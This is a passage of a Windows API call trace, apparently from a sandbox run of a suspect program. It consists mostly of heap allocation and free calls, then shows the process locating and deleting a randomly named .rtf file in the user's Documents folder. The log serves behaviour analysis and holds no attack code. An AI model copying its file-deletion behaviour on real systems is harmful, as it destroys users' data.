lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0263.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.869] CloseHandle (hObject=0x2d0) returned 1 [0263.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0263.872] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0263.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0263.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0263.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0263.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.878] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0263.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0263.879] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.879] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0263.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0263.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/M4zK0AkB79QVLka.rtf", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M4zK0AkB79QVLka.rtf", lpFilePart=0x8bedfc*="M4zK0AkB79QVLka.rtf") returned 0x3b [0263.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0263.881] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M4zK0AkB79QVLka.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m4zk0akb79qvlka.rtf")) returned 0x20 [0263.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M4zK0AkB79QVLka.rtf", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x141dbd0, ftCreationTime.dwHighDateTime=0x1d4d2f9, ftLastAccessTime.dwLowDateTime=0x7942c00, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x7942c00, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x152ef, dwReserved0=0x1c7e, dwReserved1=0x4, cFileName="M4zK0AkB79QVLka.rtf", cAlternateFileName="M4ZK0A~1.RTF")) returned 0xaa5960 [0263.881] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M4zK0AkB79QVLka.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m4zk0akb79qvlka.rtf")) returned 1 [0263.883] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x141dbd0, ftCreationTime.dwHighDateTime=0x1d4d2f9, ftLastAccessTime.dwLowDateTime=0x7942c00, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x7942c00, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x152ef, dwReserved0=0x1c7e, dwReserved1=0x4, cFileName="M4zK0AkB79QVLka.rtf", cAlternateFileName="M4ZK0A~1.RTF")) returned 0 [0263.883] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0263.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.883] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0263.884] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0263.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.885] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree 